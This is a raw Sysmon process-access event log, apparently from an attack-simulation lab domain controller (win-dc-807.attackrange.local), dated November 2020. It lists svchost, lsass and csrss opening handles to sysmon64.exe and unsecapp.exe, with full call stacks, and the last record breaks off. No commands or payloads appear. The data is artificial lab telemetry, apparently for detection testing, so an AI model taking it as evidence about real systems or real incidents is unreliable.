10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.654{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.638{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.638{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.638{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.576{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EF02-000000008701}4940C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.560{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C3A-5FA1-EF02-000000008701}4940C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 